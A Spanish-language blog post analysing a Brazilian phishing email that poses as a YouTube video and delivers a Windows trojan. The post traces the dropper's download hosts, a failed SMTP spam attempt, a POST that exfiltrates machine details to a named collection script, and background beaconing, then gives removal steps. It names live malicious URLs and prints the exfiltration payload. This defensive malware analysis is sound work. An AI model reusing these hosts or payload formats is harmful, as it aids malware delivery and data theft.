domingo, 18 de julio de 2010

Otro caso interesante: "O vídeo mais acessado do youtube, mais de 56 milhões de acessos. muito bom esse vídeo!!!!!"

En fin... esto se está haciendo vicio ya. Con pocas ganas de estudiar para los finales, aca estoy, de nuevo escribiendo sobre un mail fraudulento. Una vez mas el medio es, un supuesto video de youtube, lo gracioso es que es del mismo mail que los dos anteriores xD. El título indica el texto del mail, que viene junto con una imagen que aparenta ser un video, pero no es mas que un link al sitio: "http://premiumassessoria.com.br/css/index.p hp" que nos invita a descargar un archivo (ver.exe, sisi... .exe) de un sitio ruso....

Si por una de esas cuestiones de la vida ejecutamos este archivo (en las máquinas virtuales no uso antivirus, porque son justamente para hacer estas cosas feas) y el SIEMPRE actualizado antivirus no nos detiene, nos encontraremos bajando (de vidaboa2009.pochta.ru, que por momentos parece estar inhabilitado) un archivo llamado Vver.exe. La resolución dns del nombre nos indica que es un CNAME, y que realmente apunto a ftp.pochta.ru (un ftp si acceso anónimo xD), así y todo el archivo se descarga por http.

Acá se pone interesante, luego de descargar el archivo e infectar el sistema, pide una resolución dns para smtp.terra.com.br (un servidor de correo, seguramente de terra brasil). Con la dirección obtenida se intenta una conexión smtp (seguramente para utilizar el servidor de correo como servidor para enviar spam), pero sin éxito, posiblemente la gente de terra ya se puso manos a la obra.

El siguiente dominio a consultar es www.arqueiroverde.net, y se envía por POST la siguiente info a http://www.arqueiroverde.net/enviador.php

praquem=xurupita02@gmail.com&titulo=.::.INFECT.::.&texto=:::=-=-=-=-=-=-=-=-=-=-=-=-=-=-::: ::Usuario::  ::Monitor:: 1280 X 800 ::HD Fisico::::0485F93D ::Mac Adress:::00-0C-29-D5-C0-72 ::Data:: 17/07/2010 ::Hora::: 23:47:18 =-=-=-=--=-=-=-=-=-=-==-=-=-=-==-= &

Otro mail para nuestra lista de buenos amigos xD.

Arqueiroverde.net... lista el contenido del directorio raiz del sitio, algo muy raro, se pueden ver dos directorios, y el archivo enviador.php.

Por ultimo, el proceso que queda en ejecución en background (spoolvv) establece una comunicación http con el host "http://sbr9.hostdime.com.b r", pero no pude ver tráfico, posiblemente ya esté deshabilitado.

mmmm, para removerlo...

Primero que nada limpiar el contenido temporal del browser, cookies, etc. Luego eliminar los archivos que se crearon en C:\Windows\System32 (en caso de XP):



Y por último quitar la clave de autoarranque del registro:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Windows\\System32\\win_update.exe"

Al parecer para este llegué un poco tarde, ya que está bastante restringida su operación, al menos al parecer. Espero que aparezca uno mas interesante en estos días.

Tendría que ir pensando en escribir algo distinto, pero bue... por ahora la facultad no me permite otra cosa.

No hay comentarios:

Publicar un comentario